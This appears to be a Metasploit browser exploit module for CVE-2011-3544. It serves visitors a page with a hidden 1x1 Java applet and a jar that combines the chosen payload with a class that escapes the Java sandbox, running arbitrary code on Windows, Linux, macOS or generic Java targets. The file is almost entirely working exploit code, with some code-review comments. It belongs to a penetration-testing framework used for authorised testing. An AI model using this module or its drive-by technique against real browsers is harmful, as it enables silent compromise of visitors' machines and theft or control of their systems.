##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
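# Browser exploit for CVE-2011-3544 (Rhino Script Engine sandbox escape).
#
# The HTTP server hands a visiting browser a page with a 1x1 <applet>. The
# applet archive ("Exploit.jar") is the payload's own jar with the
# pre-compiled Exploit.class from data/exploits/cve-2011-3544 added to it;
# the class escapes the applet sandbox and runs the embedded payload.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::BrowserAutopwn

  # The landing page is a plain <applet> tag; no JavaScript is needed client-side.
  autopwn_info({ :javascript => false })

  # Class files that are packed into the served jar, each given as a list of
  # path components so nested entries get their directory entries created.
  CLASS_FILES = [
    [ "Exploit.class" ]
  ].freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Java Applet Rhino Script Engine Remote Code Execution',
        'Description' => %q{
          This module exploits a vulnerability in the Rhino Script Engine that
          can be used by a Java Applet to run arbitrary Java code outside of
          the sandbox. The vulnerability affects version 7 and version 6 update
          27 and earlier, and should work on any browser that supports Java
          (for example: IE, Firefox, Google Chrome, etc)
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Michael Schierl', # Discovery
          'juan vazquez', # metasploit module
          'Edward D. Teach <teach[at]consortium-of-pwners.net>',
          'sinn3r'
        ],
        'References' => [
          [ 'CVE', '2011-3544' ],
          [ 'OSVDB', '76500' ],
          [ 'ZDI', '11-305' ],
          [ 'URL', 'http://schierlm.users.sourceforge.net/CVE-2011-3544.html' ],
        ],
        # NOTE(review): 'osx' is not listed here although an 'Apple OSX' target
        # exists below; the per-target 'Platform' presumably takes precedence
        # for payload selection -- confirm before relying on that target.
        'Platform' => %w{java linux win},
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
        'Targets' => [
          [
            'Generic (Java Payload)',
            {
              'Arch' => ARCH_JAVA,
            }
          ],
          [
            'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [
            'Apple OSX',
            {
              # The target key is 'Arch', as in every other target. The
              # previous 'ARCH' spelling is not a recognized target key, so
              # the x86 restriction for this target was silently dropped.
              'Arch' => ARCH_X86,
              'Platform' => 'osx'
            }
          ],
          [
            'Linux x86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2011-10-18',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Serves the landing page and the applet jar.
  #
  # A URI ending in ".jar" (case-insensitive) gets a freshly built jar for
  # this client; anything else gets the HTML applet page. A non-jar URI that
  # does not end in "/" is first redirected to the resource path with a
  # trailing "/", so the relative archive="Exploit.jar" in the page resolves
  # below the module's resource instead of its parent.
  #
  # @param cli [Rex::Socket] client connection
  # @param request [Rex::Proto::Http::Request] the incoming request
  def on_request_uri(cli, request)
    unless request.uri =~ /\.jar$/i
      unless request.uri =~ /\/$/
        send_redirect(cli, get_resource() + '/', '')
        return
      end

      print_status("#{self.name} handling request")
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
      return
    end

    pl = regenerate_payload(cli)
    unless pl
      # regenerate_payload yields nil when no payload could be built for this
      # client; answer the request instead of leaving the browser hanging.
      print_error("Failed to generate the payload")
      send_not_found(cli)
      return
    end

    jar = pl.encoded_jar
    add_class_files(jar)

    print_status("Sending Applet.jar")
    send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" })

    handler(cli)
  end

  # Returns the landing page: a 1x1 applet whose archive is the relative URL
  # "Exploit.jar", which on_request_uri answers with the payload jar.
  #
  # @return [String] the HTML document
  def generate_html
    '<html><head></head>' \
      '<body>' \
      '<applet archive="Exploit.jar" code="Exploit.class" width="1" height="1">' \
      '</applet></body></html>'
  end

  private

  # Adds every entry of CLASS_FILES from data/exploits/cve-2011-3544 to +jar+,
  # first creating any intermediate directory entries the jar lacks.
  #
  # @param jar [Rex::Zip::Jar] the payload jar being assembled
  def add_class_files(jar)
    data_dir = File.join(Msf::Config.data_directory, "exploits", "cve-2011-3544")

    CLASS_FILES.each do |path|
      # Directory entries for "a/b/File.class" are "a/" and "a/b/".
      1.upto(path.length - 1) do |depth|
        dir_entry = path[0, depth].join("/") + "/"
        jar.add_file(dir_entry, '') unless jar.entries.any? { |e| e.name == dir_entry }
      end

      # binread closes the handle even if reading raises, unlike the
      # open/read/close sequence this replaces.
      jar.add_file(path.join("/"), File.binread(File.join(data_dir, *path)))
    end
  end
end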